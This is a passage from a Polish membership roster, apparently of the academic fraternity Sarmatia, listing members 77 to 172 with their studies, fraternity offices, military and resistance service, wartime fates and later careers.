 77. Stanisław Konarski, (6 czerwca 1908 w maj. Kluczewsko - 8 kwietnia 1968 w Warszawie) s. Maksymiliana i Janiny z Fuldów, absolwent Gimnazjum im. Jana Kochanowskiego w Radomiu, student i absolwent (mgr) rolnictwa SGGW, c. 1928, akt. 1928-32, sekretarz sem. zim. 1929/30, po studiach gospodarował we własnym maj. Kluczewsko w pow. włoszczowskim, w czasie okupacji w konspiracji w AK “Uprawa”, po wojnie starszy inspektor w Ministerstwie Rolnictwa, zmarł tragicznie w wypadku, pochowany w grobie rodzinnym w Lisowie k. Jedlińska

 78. Jan Konrad Kossko, (2 września 1888 - 4 maja 1958 w Warszawie) ze Żmudzi, student Uniwersytetu w Petersburgu, założyciel Sarmacji w Petersburgu 1908, prawnik, adwokat
 79. Aleksander Kotarski, (1912 - 1978 w Recife w Brazylii) brat Marcelego i Zygmunta (obaj Sarmatia), student UW, c. 1930, akt. 1930-32, dr praw, żołnierz PSZ na Zachodzie, po wojnie na emigracji w Argentynie (?) i Brazylii (?)
 80. Marceli Kotarski, (1907 - 23 listopada 1927) brat Aleksandra i Zygmunta (obaj Sarmatia), student prawa UW, c. 1926
 81. Zygmunt Kotarski, (19 listopada 1914 - 7 czerwca 1992) brat Aleksandra i Marcelego (obaj Sarmatia), student SGGW, c. 1935, inż.. Rolnik, w wojnie obronnej 1939 w 9 i 27 Pułku Ułanów, pochowany na warszawskich Powązkach
 82. Janusz Kozakiewicz, (26 maja 1911 w Kamienskoje na Ukrainie - listopad 1993) absolwent Gimnazjum im. S. Batorego, student SGGW, c. 1930, akt. 1930-32, inż. rolnik 1934, administrator maj. w Giżycach 1934-39, w wojnie obronnej 1939 w 102 Pułku Ułanów, internowany w litewskich obozach w Olikcie, Rakiszkach i Kalwarii, uciekł z niewoli, w czasie okupacji w partyzantce ZWZ-AK na Wileńszczyźnie i Kowieńszczyźnie, uczestnik Akcji “Burza”, aresztowany przez Sowietów w 1944, wywieziony do obozów internowania w głąb Rosji 1944-37, po wojnie wieloletni pracownik Instytutu Rolnego w Warszawie, doc. dr hab. nauk rolniczych, autor 100 prac naukowych, porucznik AK, odznaczony Krzyżem Walecznych, Srebrnym Krzyżem Zasługi z Mieczami, Krzyżem AK, Krzyżem Kawalerskim Rolonia Restituta
 83. Józef Krasicki, student SGGW, c. 1918, akt. 1918-29, żołnierz wojny polsko-bolszewickiej 1920, inż. rolnik

  Władysław Krassowski, lata 20-te (?).

 84. Władysław Krassowski, (11 czerwca 1885 - 28 stycznia 1944 w Auschwitz) z Dziśnieńczyzny, student Uniwersytetu w Petersburgu, założyciel Sarmacji w Petersburgu 1908, prawnik, w czasie okupacji osadzony w obozie koncentracyjnym w Auschwitz, tam zamordowany

 85. Jerzy Radwan Krotkiewski, (1898 - 18 marca 1984 w Arras) student PW, c. 1924, akt. 1924-32, inż. architekt, żołnierz w wojnie obronnej 1939, więzień oflagu w Murnau, po wojnie na emigracji we Francji
 86. Władysław Krotkiewski, (1906 - 31 marca 1982) student SGGW, c. 1929/30, akt. 1929/30-31, inż. leśnik, w czasie okupacji więzień obozu koncentracyjnego w Auschwitz
 87. Tadeusz Kuczyński, ( - 1920) założyciel Sarmacji w Warszawie 1915, żołnierz wojny polsko-bolszewickiej 1920, w której poległ

  Zbigniew Korwin-Kuczyński, 1938 r.

 88. Zbigniew Korwin-Kuczyński, (6 grudnia 1917 w Kopylu k. Mińska - 11 września 2013 w Toronto) z rodziny ziemiańskiej, absolwent Gimnazjum Ziemi Mazowieckiej w Warszawie 1936, student SGGW 1936-39, c. 1937, w wojnie obronnej 1939 w 1 Pułku Ułanów Krechowieckich, w czasie okupacji administrował własnymi maj. ziemskimi w woj. warszawskim, w konspiracji w AK, w powstaniu warszawskim brał udział w walkach o Dworzec Gdański, po upadku powstania w niewoli niemieckiej w obozach w Sandbostel, po wyzwoleniu w II Korpusie PSZ na Zachodzie 1945-46?, w 1947 wyemigrował z Wielkiej Brytanii do Kanady, początkowo pracowła na fermie oraz w innych miejsach, w 1956 założył sklep obuwniczy Shoe Store przy ul. Roncesvalles, a następnie w 1964 Richard’s Shoe Salon, działacz organizacji weteranów wojennych i polonijnych, skarbnik Funduszu Inwalidzkiego Kongresu Polonii Kanadyjskiej 1955-79, członek Zarządu Kongresu (Okręg Toronto), członek, w tym wiceprezes Koła nr 20 Stowarzyszenia Polskich Kombatantów i Koła Byłych Żołnierzy AKw Toronto, członek zarządu i prezes Związku Kawalerzystów i Artylerzystów Konnych w Ameryce Pólnocnej, odznaczony m.in. dwukrotnie Krzyżem Walecznych, Brązowych Krzyżem Zasługi z mieczami, trzykrotnie Medalem WP, Krzyżem za Wrzesień 1939, Krzyżem AK, odznaczenami War Medal i innymi brytyjskimi odznaczeniami, Złotym i Srebrnym Krzyżem Zasługi, Krzyżem Miecze Hallerrowskie, pochowany w Toronto

 89. Stefan Kuligowski, ( - przed 1944) student SGGW, c, 1924, akt. 1924-30, wiceolderman sem. zim. 1930/31, inż. rolnik, w wojnie obronnej 1939 w artylerii, w czasie okupacji osadzony w obozie koncentracyjnym, tam zamordowany
 90. Tadeusz Kuligowski, ( - po 1975) student UW, c. 1924, akt. 1924-28, wiceprezes sem. zim. i sem. let. 1924/25, prezes sem. zim. 1927/28, prawnik, adwokat, w czasie okupacji w AK

  Stanisław Kunstetter, 1938 r.

 91. Stanisław Kunstetter, (7 września 1912 - 20 września 1985) student PW, c. 1931, akt. 1931-38, prezes sem. let. 1935/36, olderman sem. zim. i sem. let. 1937/38, inż. mechanik, w czasie okupacji w Tajnych Wojskowych Zakładach Wydawniczych AK, w Powstaniu Warszawskim żołnierz AK, więzień oflagu w Gross-Born i Sandbostel, po wojnie prof. PW

 92. Jan Leduchowski, ( - przed 1944) student SGGW, c. 1938, zginął w nieznanych okolicznościach w czasie wojny przed 1944
 93. Jan Lenczewski-Samotyja, ( - 1938) w wojnie polsko-bolszewickiej 1920 w 1 Pułku Ułanów Krechowieckich, student SGGW, akt. 1928-32, inż. rolnik, zmarł tragicznie
 94. Eugeniusz Lesser, student PW, c. 1918, żołnierz wojny polsko-bolszewickiej 1920, inżynier
 95. Stanisław Lewicki, (23 września 1908 - 27 stycznia 1994) student UW, c. 1930, akt. 1930-32, wiceolderman sem. zim. 1932/33, wiceprezes zewnętrzny ZPKA 1933-35 (XIII kadencja), ekonomista, w wojnie obronnej 1939 w 5 Pułku Piechoty Legionów, w czasie okupacji w 2 Dywizji Strzelców Pieszych we Francji i 14 Pułku Artylerii Lekkiej w Anglii, po wojnie pracownik Izby Przemysłowo-Handlowej w Warszawie
 96. Jerzy Libiszowski, (7 października 1906 - 1 stycznia 1982) student UW, c. 1928, akt. 1928-32, prawnik, w wojnie obronnej 1939 w artylerii
 97. Józef Karol Libiszowski, (21 czerwca 1914 - 10 marca 1986 w Filadelfii) student SGH, c. 1933, rolnik ekonomista, w czasie II wojny światowej w PSZ na Zachodzie, odznaczony Krzyżem Virtuti Militari, po wojnie na emigracji w Stanach Zjednoczonych
 98. Zygmunt Lubiński, c. 1923

  Stanisław Łepkowski, 1938 r.

 99. Stanisław Łepkowski, (1918 - 26 marca 1976) student SGGW, c. 1937, rolnik

   

 100. Stanisław Łada Łobarzewski, ( - po 1920) żołnierz wojny polsko-bolszewickiej 1920
 101. Witold Łukasiewicz, (7 listopada 1915 - 29 sierpnia 1995 w Warszawie) student PW i PŁ, c. 1935, inż. mechanik, w Powstaniu Warszawskim w AK na Mokotowie, po Powstaniu wywieziony na roboty do Austrii
 102. Wacław Łukaszewicz, student UW, c. 1924, akt. 1924-26

  Jerzy Maciejewicz, 1938 r.

 103. Jerzy Maciejewicz, ( - po 1986) student rolnictwa SGGW, c. 1937-38, sekretarz sem. let. 1937/38

 104. Stanisław Maciejowski, (1909 - 1930) student prawa UW, c. 1927, akt. 1927-30, zginął na poligonie podczas manewrów
 105. Konstanty Makomaski, ( - 1940 ? w Katyniu ?) kuzyn Kazimierza i Tadeusza (obaj Jagiellonia), student PW, c. 1919, żołnierz wojny polsko-bolszewickiej 1920, inżynier, w niewoli sowieckiej (?), zamordowany przez NKWD (?)

  Włodzimierz Makomaski, 1938 r.

 106. Włodzimierz Makomaski, (2 października 1917 - 6 marca 1987) student prawa UW, c. 1936, w Powstaniu Warszawskim w 8 Dywizji Piechoty AK na Żoliborzu

 107. Stanisław Andrzej Makowski, (12 listopada 1902 - 5 września 1980) żołnierz wojny polsko-bolszewickiej 1920, student UW, c. 1925, akt. 1925-32, olderman sem. zim. 1928/29 i sem. zim. 1930/31, prezes sem. zim. 1931/32, prawnik, w wojnie obronnej w 76 Pułku Piechoty, więzień oflagu w Murnau

  Olgierd Czesław Malinowski, początek XX wieku.

 108. Olgierd Czeslaw Malinowski, (9 kwietnia 1882 - 12 marca 1959 w Opolu) s. Władysława, student Uniwersytetu w Petersburgu, inicjator, założyciel i pierwszy prezes Sarmacji w Petersburgu 1908, prawnik, w końcu lat 30-tych wicewojewoda wileński, po wojnie starosta na Ziemiach Odzyskanych

 109. Wacław Maliszewski, student PW, żołnierz wojny polsko-bolszewickiej 1920, c. 1920, inż. budowy dróg i mostów
 110. Władysław Manduk, (30 lipca 1910 - 18 czerwca 1989) student PW, c. 1931, akt. 1931-32, inż. chemik, w wojnie obronnej 1939 w artylerii, w czasie okupacji w AK
 111. Tadeusz Marconi, (1899 - ) student PW, żołnierz wojny polsko-bolszewickiej 1920, c. 1920, inżynier
 112. Jerzy (van den) Mersch, ( - 1943 w Auschwitz) student UW, c. 1928, akt. 1928-31, prawnik, w czasie okupacji w AK, aresztowany i osadzony w obozie koncentracyjnym w Auschwitz, tam zamordowany

  Adam Mędrzecki, lata 20-te (?).

 113. Adam Mędrzecki, student PW, c. 1918, akt. 1918-28, żołnierz wojny polsko-bolszewickiej 1920, inżynier

 114. Jerzy (Dunin)-Mieczyński, (27 maja 1912 - 2 sierpnia 1944 pod Babicami) student PW, c. 1931, akt. 1931-39?, ostatni olderman sem. let. 1938/39, inż. mech., w wojnie obronnej 1939 w obronie Warszawy, w czasie okupacji w AK, w Powstaniu Warszawskim dowódca 237 plutonu Batalionu “Żubr”, poległ pod Babicami
 115. Kazimierz Mieszkis, (15 czerwca 1911 - lata 90-te) student PW, c. 1931, akt. 1931-32, absolwent PW, inż. chemik, żołnierz artylerii w PSZ na Zachodzie, po wojnie na emigracji w Wielkiej Brytanii
 116. Tadeusz Mikołajczewski, (19 luty 1911 - 2 sierpnia 1944 pod Babicami) c. 1933, inż. chemik PW, żołnierz AK, w czasie Powstania Warszawskiego w 237 plutonie Batalionu “Żubr”, poległ pod Babicami
 117. Antoni Mikoszewski, ( - 1942 we Wronowie) student SGGW, c. 1929, inż. rolnik, w czasie okupacji w partyzantce AK w Kieleckim, poległ w walkach we Wronowie k. Nowej Słupi w Kieleckim
 118. Stefan Miłkowski, (1911 - 6 sierpnia 1944 w Warszawie) student UW, c. 1930, akt. 1930-32, sekretarz sem. zim. 1931/32, mgr praw, adwokat w Warszawie, w czasie okupacji w Komendzie Głównej AK, w Powstaniu Warszawskim w Batalionie “Radosław”, poległ w Śródmieściu
 119. Kazimierz Świętopełk-Mirski, z Mińszczyzny, student prawa Uniwersytet w Petersburgu, założyciel Sarmacji w Petersburgu 1908, prawnik, skarbnik Związku Filistrów Sarmacji 1931,
 120. Andrzej Miszewski, (1912 - ok. 2006) student PW, c. 1931, akt. 1931-32, inż. mechanik, w wojnie obronnej 1939 w lotnictwie, w czasie wojny we Francji i Wielkiej Brytanii w RAF, odznaczony Krzyżem Virtuti Militari i czterokrotnie Krzyżem Walecznych, w 1948 wrócił do Polski, od 1962 na emigracji w Republice Południowej Afryki
 121. Jan Maciej Miszewski, (27 grudnia 1913 - ) c. 1932, student PW, c. 1932, inż. architekt, w wojnie obronnej 1939 w lotnictwie, w czasie wojny we Francji i Wielkiej Brytanii w RAF, odznaczony Krzyżem Virtuti Militari i trzykrotnie Krzyżem Walecznych, po wojnie na emigracji w Republice Południowej Afryki, prof. architektury na Uniwersytecie w Capetown
 122. Jan Mitraszewski, (1900 - 16 stycznia 1979) student PW, c. 1925, akt. 1925, inż. budownictwa lądowego, w czasie okupacji i w Powstaniu Warszawskim w AK, później w obozie jenieckim
 123. Wiktor Modzelewski, (1917 - ) student rolnictwa SGGW, c. 1938, w czasie okupacji w partyzantce na Lubelszczyźnie, po wojnie zesłany na 20 lat do ZSRR
 124. Józef Moldenhauer, z Kurlandii lub z Inflant, student Uniwersytetu w Petersburgu, założyciel Sarmacji w Petersburgu 1908, prawnik, notariusz
 125. Jerzy Morzycki, student UW, akt. 1925-30, dr medycyny, w latach 30-tych dyrektor Państwowych Zakładów Higienicznych w Poznaniu, w czasie okupacji w AK przy produkcji szczepionek przeciwtyfusowych
 126. Tadeusz Mścichowski, ( - 1953) student SGGW, c. 1931, akt. 1931-32, rolnik

  Tomasz Jodko-Narkiewicz, 1938 r.

 127. Tomasz Jodko-Narkiewicz, (1918-1992) student SGH, c. 1937, ekonomista, w 1938 w akcji “Łom” na rusi Karpackiej (?), w wojnie obronnej w 12 Pułku Ułanów, w czasie okupacji w AK w Baonie “Las” 7 Dywizji Piechoty

 128. Aleksander Neuhoff von der Ley, (25 listopada 1915 - 25 września 1944 w Warszawie) s. Reinholda Aleksandra i Wiktorii z Jelskich, student PW, c. 1933, akt. 1933-39, olderman sem. zim. 1938/39, inż. budownictwa lądowego, w powstaniu warszawskim w AK ps. “Olek” w Batalionie “Baszta”, poległ na Mokotowie na ul. Czeczota, odznaczony Krzyżem Walecznych [Źródło (poza wskazanymi poniżej spisu członków): Archiwum (baza danych osobowych) Kurlandzko-Inflanckie]

  Cyryl Niewiadomski, lata 30-te.

 129. Cyryl Niewiadomski, (4 kwietnia 1913 w Petersburgu - 24 luty 1980) syn Pawła Niewiadomskiego i Eugenii z Maierów, absolwent Korpusu Kadetów w Chełmie 1931, student PW, c. 1932, akt. 1932, inż. chemik 1936, od 1940 w wywiadzie AK, m.in. w akcji rozpracowania produkcji rakiet V2, po wojnie dyrektor i dyrektor techniczny Walcowni Metali Nieżelaznych w Dziedzicach 1945-48, szykanowany w okresie stalinowskim, osadzony na kilka miesięcy w areszcie śledczym, od 1948 zatrudniony w branży kablowej m.in. jako Główny Technolog Zjednoczenia, a następnie Centralnego Zarządu Przemysłu Kablowego, Naczelny Dyrektor Centralnego Biura Przemysłu Kablowego w Ożarowie pod Warszawą 1957-63 w 1963-79, w Instytucie Łączności, m.in. jako samodzielny pracownik naukowo-badawczy (docent mgr inż.)

 130. Adam Niewiarowski, (1917 - wrzesień 1944 w Warszawie) student UW i SGGW, c. 1935-39, sekretarz sem. zim. 1937/38, sekretarz sem. zim. 1938/39, inż. rolnik, w czasie okupacji i w Powstaniu Warszawskim w AK, poległ na Mokotowie
 131. Władysław Nowakowski, (8 marca 1914 - 28 maja 2010) student PW, c. 1933, inż. elektryk, w wojnie obronnej 1939 w artylerii, w czasie okupacji w AK w Kieleckim, pochowany na Cmentarzu na Jeżycach w Poznaniu
 132. Jan Oczechowski, ( - 1944 w Warszawie) student prawa UW, c. 1935, akt. 1935-39, ostatni wiceprezes sem. zim. i sem. let. 1938/39, w wojnie obronnej 1939 w kawalerii, w czasie okupacji i w Powstaniu Warszawskim w AK, poległ na Mokotowie (?)
 133. Stanisław Zygmunt Okolski, ( - 1954) student SGGW, c. 1930/31, akt. 1930/31-32, rolnik
 134. Tadeusz Okulicz, student prawa UW, c. 1931, akt. 1931
 135. Mieczysław Olszewski, student ekonomii WSH, c. 1930, akt. 1930-31, w czasie wojny w PSZ na Zachodzie we Francji i Wielkiej Brytanii, po wojnie na emigracji w Wielkiej Brytanii
 136. Aleksander Ryszard Olszowski, (1911 - 8 września 1977) student SGGW, c. 1929/30, akt. 1929/30-32, wiceolderman sem. zim. 1931/32, wiceprezes sem. let. 1931/32, prezes sem. let. 1932/33, inż. rolnik, w czasie okupacji w AK “Uprawa”
 137. Konrad Opalski, student PW, c. 1916, żołnierz wojny polsko-bolszewickiej 1920, inż. budowy dróg i mostów
 138. Zbigniew Osiński, (14 listopada 1911 - 25 lipca 2000) student PW, c. 1931, akt. 1931-36, wiceprezes sem. let. 1935/36, inż. elektryk, w czasie wojny obronnej 1939 w Fabryce Amunicji w Skarżysku, po wojnie pracownik Polskiej Energetyki
 139. Bohdan Ostrowski, (1912 - 6 lipca 1979) student ekonomii WSH, c. 1930, akt. 1930-32, w czasie wojny w 2 Dywizji Strzelców Pieszych we Francji
 140. Franciszek Ostrowski, ( - 1943 w Warszawie) żołnierz wojny polsko-bolszewickiej 1920, student SGGW, c. 1923, akt. 1923-26, inż. rolnik, w czasie okupacji w AK “Uprawa”, rozstrzelany przez Gestapo

  Henryk Pankiewicz, lata 20-te.

 141. Henryk Pankiewicz, (1894 - 14 listopada 1977) student PW, założyciel Sarmacji w Warszawie 1915, akt. 1915-25, w wojnie polsko-bolszewickiej 1920 w lotnictwie, pierwszy prezes ZPKA 1922-23 (I kadencja), odznaczony Dyplomem Zasługi i Złotej Odznaki ZPKA, inż. mechanik

 142. Ludwik Paprocki, student PW, c. 1923, akt. 1923-25, inżynier
 143. Marian Pawliński, ( - 1938) student PW, c. 1924, inżynier
 144. Jan Pełka, (1908 - ) student PW, c. 1930, akt. 1930/31-32, mgr inż. architekt, żołnierz w wojnie obronnej 1939
 145. Tadeusz Pfeiffer, (10 maja 1912 - 22 listopada 1996 w Brazylii) student SGH, c. 1931, akt. 1931-32, ekonomista, w czasie okupacji w AK, w Powstaniu Warszawskim na Woli i w Śródmieściu, po wojnie na emigracji w Brazylii
 146. Stanisław Piasecki, żołnierz wojny polsko-bolszewickiej 1920, student PW, inżynier
 147. Zygmunt Piastuszkiewicz, student PW, c. 1918, żołnierz wojny polsko-bolszewickiej 1920, inżynier

  Edward Korwin-Piotrowski, 1938 r.

 148. Edward Korwin-Piotrowski, (7 marca 1920 - 24 stycznia 1944 w Warszawie) student UW, c. 1937, mgr praw UP (?), w wojnie obronnej 1939 w 1 Pułku Szwoleżerów, w czasie okupacji w AK, rozstrzelany przez Niemców w zbiorowej egzekucji ulicznej

 149. Zygmunt Podczaski, ( - przed 1939) student PW, założyciel Sarmacji w Warszawie 1915, w wojnie polsko-bolszewickiej 1920 w pułku ułanów, inżynier
 150. Witold Poklewski-Koziełł, (1912 - 31 lipca 1979 w Johannesburgu) student PW, c. 1930, akt. 1930-32, inż. chemik, w wojnie obronnej 1939 saper w Armii Kraków, w czasie wojny w 1 Dywizji Pancernej PSZ na Zachodzie, odznaczony Krzyżem Walecznych, po wojnie na emigracji w Republice Południowej Afryki
 151. Wojciech Polakowski, (1919 - 8 listopada 1985) student SGH, c. 1938, ekonomista, w czasie okupacji w AK
 152. Janusz Popiel, (31 marca 1910 w Warszawie - 26 stycznia 1986 w Londynie) syn Włodzimierza i Kazimiery z Pilanowskich, absolwent Gimnazjum Ludwika Lorentza, student UW, student UP Poznań (1932), c. 1928, akt. 1928-32, mgr praw UP, starszy asystent przy Katedrze Teorii i Filozofii Prawa na Wydziale Prawno-Ekonomicznym UP, w wojnie obronnej w 6 Batalionie Pancernym, m.in. w obronie Warszawy, w kampanii francuskiej 1940 dowódca plutonu 1 Kompanii Czołgów, później w 1 Dywizji Pancernej PSZ na Zachodzie, kilkakrotnie więziony i ranny, odznaczony czterokrotnie Krzyżem Walecznych, Krzyżem Zasługi z Mieczami, Złotym Krzyżem Zasługi, francuskim Orderem Legii Honorowej i francuskim Krzyżem Wojennym z palmą oraz belgijskimi Orderem Leopolda i Krzyżem Wojennym z palmą, pierwszy prezes i redaktor “Komunikatów” Koła Filistrów Sarmacji na Obczyźnie 1978-86
 153. Zygmunt Poradowski, (1896 - listopad 1974 w Hiszpanii) student PW, założyciel Sarmacji w Warszawie 1915, w wojnie polsko-bolszewickiej w 8 Pułku Ułanów, inżynier, po wojnie na emigracji w Hiszpanii i Stanach Zjednoczonych

  Ryszard Posiadało, 1938 r.

 154. Ryszard Posiadało, (1917 - wrzesień 1939 pod Strońskiem) student PW, c. 1935, akt. 1935-38, wiceolderman sem. let. 1937/38, inżynier, pchor. rez., w wojnie obronnej 1939ł w 30 Pułku Strzelców Kaniowskich, poległ nad Wartą w okolicach Strońska

 155. Julian Prądzyński, (1903 - 3 maja 1959 w Casablance) student UW, w wojnie polsko-bolszewickiej 1920 w 1 Pułku Ułanów, c. 1919, prezes sem. zim. 1924/25, wiceprezes zewnętrzny ZPKA 1923-24 (II kadencja), prawnik, adwokat, w Powstaniu Warszawskim w AK na Śródmieściu, po wojnie na emigracji w Hiszpanii

 156. Władysław Pręczkowski, (13 lutego 1888 w Warszawie - 1940 w Charkowie), s. Ignacego i Zdzisławy z Gibasiewiczów, brat Zygmunta (Lutycja), student Uniwersytet w Petersburgu, założyciel Sarmacji w Petersburgu 1908, prawnik, w pierwszej wojnie światowej w armii rosyjskiej 1915-18, absolwent Mikołajewskiej Szkołę Kawalerii, żołnierz 10 Pułu Ułanów w wojnie 1919-21, por. rez., ochotnik w wojnie obronnej 1939 w Oddziale Zapasowym Mazowieckiej i Pomorskiej Brygady Kawalerii, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD
 157. Kazimierz Pryliński, (27 grudnia 1907 - 15 listopada 1986) student SGGW, c. 1928, akt. 1928-32, inż. rolnik, w czasie wojny w PSZ na Zachodzie, po wojnie na emigracji w Republice Południowej Afryki, eksplorator i odkrywca wielu złóż kopalin w Afryce
 158. Zdzisław Pryliński, (27 grudnia 1905 - 30 sierpnia 1940 w Palmirach) student PW, c. 1928, akt. 1928-32, inż. budownictwa wodnego, w czasie okupacji w AK, rozstrzelany przez Niemców w Palmirach

  Jan Przybyłowicz, 1938 r.

 159. Jan Przybyłowicz (Wojtowicz ?), ( - po 2010) c. 1938, w czasie okupacji w AK, po wojnie na emigracji w Australii

 160. Kazimierz Rauszer, (1906 - 1968 w Londynie) student PW, c. 1928, akt. 1928-32, inżynier, w wojnie obronnej 1939 w artylerii, w czasie wojny w ruchu oporu we Francji, po wojnie na emigracji w Wielkiej Brytanii
 161. Tomasz Zbysław Rauszer, (22 września 1908 - 1 maja 1985) student PW, c. 1928, akt. 1928-32, sekretarz sem. let. 1930/31, inż. mechanik, w czasie wojny w partyzantce AK w Kieleckim, po wojnie docent

  Henryk Rehbinder, 1938 r.

 162. Henryk Rehbinder, (30 maja 1919 w Żytomierzu - 26 grudnia 1981 w Konstancinie) s. Leona i Marii z Lisowskich student SGGW, c. 1937, inż. rolnik, w czasie okupacji w AK [Źródło (poza wskazanymi poniżej spisu członków): Roman Aftanazy, Dzieje Rezydencji, t. 10, s. 349-350]

 163. Mikołaj Rekosz, ( - przed 1944 w Skombobole k. Wiżajn) student SGGW, c. 1931, akt. 1931-32, inż. rolnik, w czasie okupacji w AK, aresztowany i zesłany do obozu koncentracyjnego, tam zamordowany

  Kazimierz Rentel, 1974 r.

 164. Kazimierz Rentel, (1897 - 5 marca 1977) student PW, c. 1918, inż. mechanik, w wojnie polsko-bolszewickiej 1920 w 4 Pułku Ułanów, żołnierz wojny obronnej 1939, później w 2 Dywizji Strzelców Pieszych we Francji

 165. Stanisław Roguski, (12 lutego 1912 - 19 maja 1983) student UW, c. 1931, akt. 1931-32, prawnik, w wojnie obronnej 1939 w 26 Pułu Ułanów, w czasie okupacji w partyzantce AK w Sandomierskim

  Tadeusz Rozdeiczer-Kryszkowski.

 166. Tadeusz Rozdeiczer-Kryszkowski (pierwotnie Rozdejczer), (12 maja 1905 w maj. Rodzinnym Kryszkowice pow. Nieszawa - 3 stycznia 1984 w Warszawie) syn Karola i Marii z Saryusz-Woyciechowskich, absolwent Gimnazjum im. A. Mickiewicza 1923, student UW, Sorbony i Instytutu Prawa Międzynarodowego, c. 1923, akt. 1923-25, sekretarz sem. let. 1924/25, mgr praw 1928, odbył aplikację sądową i adwokacką, od 1936 w administracji państwowej w Biurze Akcji i Planowania Prezydium Rady Ministrów, a od 1937 w Ministerstwie Przemysłu i Handlu w Wydziale Polityki Handlowej i Traktatowej (kierownik referatu Bałkany), sekretarz ugrupowania młodzieżowego “Klub 11 Listopada”, w czasie okupacji do 1942 w kontrwywiadzie AK, od Wywiadzie Informacji Politycznej Biura Informacji i Propagandy Komendy Głównej AK ps. “Radny”, w Powstaniu Warszawskim w składzie załogi stacji UKF, po wojnie pełnił wiele odpowiedzialnych funkcji m.in. dyrektor Departamentu Polityki Handlowej i Traktatów Ministerstwa Żeglugi 1945-47, a następnie zastępcą dyrektora Centrali Handlu Zagranicznego “Społem” 1947-48, dyrektor Centrali Kursów przy Zarządzie Głównym Polskiego Towarzystwa Ekonomicznego, pochowany na cmentarzu w Pyrach, odznaczony m.in. Srebrnym Krzyżem Zasługi z Mieczami i Krzyżem Kawalerskim OOP

 167. Jerzy Rudowski, (26 luty 1901 w Warszawie - 11 listopada 1973 w Warszawie) syn Zygmunta i Zofii z Mieczkowskich, brat Zygmunta, brat stryjeczny Józefa, Leonarda i Szymona (wszyscy Sarmatia), brat stryjeczny Stanisława (Jagiellonia), brat stryjeczny Jana i Zygmunta (Helania), brat stryjeczny Jana (Praetoria), brat stryjeczny Michała (Corona), absolwent Gimnazjum im. E. Konopczyńskiego w Warszawie, student PW i PL, c. 1919, żołnierz wojny polsko-bolszewickiej 1920, inż. mechanik 1929, odbywał praktyki w przemyśle mleczarskim w Niemczech i w Danii, w 1931 zorganizował i prowadził wraz z ojcem Biuro Techniczno-Mleczarskie ERIDAN (do wybuchu wojny zaprojektował i urządził 200 mleczarni na ternie kraju), od 1935 kierował warsztatami mechanicznymi w fabryce “Pelikan”, w 1937 założył własne warsztaty mechaniczne, w których w czasie okupacji wykonywał konspiracyjnie części broni dla ruchu oporu, po wojnie w przemyśle mleczarskim w Centrali Spółdzielni Mleczarsko-Jajczarskich, Biurze Projektów Inwestycyjnych Przemysłu Mięsnego i Mleczarskiego, Ośrodku Informacji w Fabryce Aparatury Mleczarskiej i Biurze Projektowo-Konstrukcyjnym CZSMI, wieloletni wykładowca maszyn mleczarskich na SGGW, Wyższej Szkole Rolniczej w Olsztynie

  Józef Rudowski, 1974 r.

 168. Józef Rudowski, (11 stycznia 1911 - 12 lutego 2003 w Podkowie Leśnej) syn Michała i Bronisławy z Mieczkowskich, brat Leonarda i Szymona, brat stryjeczny Jerzego i Zygmunta (wszyscy Sarmatia), brat stryjeczny Stanisława (Jagiellonia), brat stryjeczny Jana i Zygmunta (Helania), brat stryjeczny Jana (Praetoria), brat stryjeczny Michała (Corona), student SGGW, student WSH (1932), c. 1930, akt. 1930-32, mgr ekonomii SGH, w czasie wojny w AK, pochowany w Podkowie Leśnej k. Warszawy

  Leonard Rudowski, 1930 r.

 169. Leonard Rudowski, (6 listopada 1905 w majątku Grzebsk k. Mławy - 12 marca 1980 w Thais pod Paryżem) syn Michała i Bronisławy z Mieczkowskich, brat Józefa i Szymona, brat stryjeczny Jerzego i Zygmunta (wszyscy Sarmatia), brat stryjeczny Stanisława (Jagiellonia), brat stryjeczny Jana i Zygmunta (Helania), brat stryjeczny Jana (Praetoria), brat stryjeczny Michała (Corona), absolwent Gimnazjum im. S. Wyspiańskiego w Mławie 1923, student UW, c. 1923, akt. 1923-31, olderman sem. zim. 1929/30, prezes ZPKA 1930-31 (X kadencja), działacz Bratniej Pomocy i Sodalicji Mariańskiej, mgr praw 1928, adwokat, prowadził z kolegą kancelarię adwokacką w Płocku 1934-39, w tym okresie radca prawny ks. biskupa Leona Wotmańskiego, zaangażowany w katolicką działalność edukacyjną z młodzieżą wiejską, na wniosek kurii za tę pracę odznaczony medalem Pro Ecclesia et Pontifice, w wojnie obronnej 1939 zmobilizowany, w Wilnie internowany przez wojska radzieckie, uciekł i przez Rygę dotarł do Francji, w czasie wojny we francuskim ruchu oporu, zatrzymany przez Niemców i osadzony w obozie, po wojnie na emigracji we Francji, działacz katolicki i związkowy, m.in. Sekretarz Generalny Administracyjny Polskiego Zjednoczenia Katolików, radca prawny Misji Katolickiej w Paryżu, odznaczony papieskim orderem św. Sylwestra, pochowany na cmentarzu w Thiais

  Szymon Rudowski, 1974 r.

 170. Szymon Rudowski, (31 stycznia 1907 w Grzebsku - 13 lipca 1975 w Warszawie) syn Michała i Bronisławy z Mieczkowskich, brat Józefa i Leonarda, brat stryjeczny Jerzego i Zygmunta (wszyscy Sarmatia),brat stryjeczny Stanisława (Jagiellonia), brat stryjeczny Jana i Zygmunta (Helania), brat stryjeczny Jana (Praetoria), brat stryjeczny Michała (Corona), absolwent Gimnazjum im. S. Wyspiańskiego w Mławie, student SGGW, c. 1925, akt. 1925-30, sekretarz sem. zim. 1927/28, wiceprezes sem. zim. 1928/29, prezes sem. zim. 1929/30, inż. rolnik, po studiach prowadził gospodarstwa rodzinne w Grzebsku i Bogurzynie, w wojnie obronnej w 11 Pułku Ułanów im. Rydza Śmigłego, w czasie okupacji w AK przechowując i rozwożąc broń, po wojnie m.in. w Państwowym Zakładzie Ubezpieczeń Wzajemnych, IUNG i Centrali Nasiennej

 171. Zygmunt Rudowski, (1906 - 25 listopada 1975) syn Zygmunta i Zofii z Mieczkowskich, brat Jerzego, brat stryjeczny Józefa, Leonarda i Szymona (wszyscy Sarmatia), brat stryjeczny Stanisława (Jagiellonia), brat stryjeczny Jana i Zygmunta (Helania), brat stryjeczny Jana (Praetoria), brat stryjeczny Michała (Corona), student ekonomii WSH, c. 1925, akt. 1925-29, sekretarz sem. zim. 1926/27, w czasie wojny w 2 Dywizji Grenadierów i ruchu oporu we Francji
 172. Wacław Rutkowski, ( - 1976) student SGGW, c. 1918, żołnierz 4 Pułku Ułanów, inż. rolnik, po wojnie na emigracji w Wielkiej Brytanii
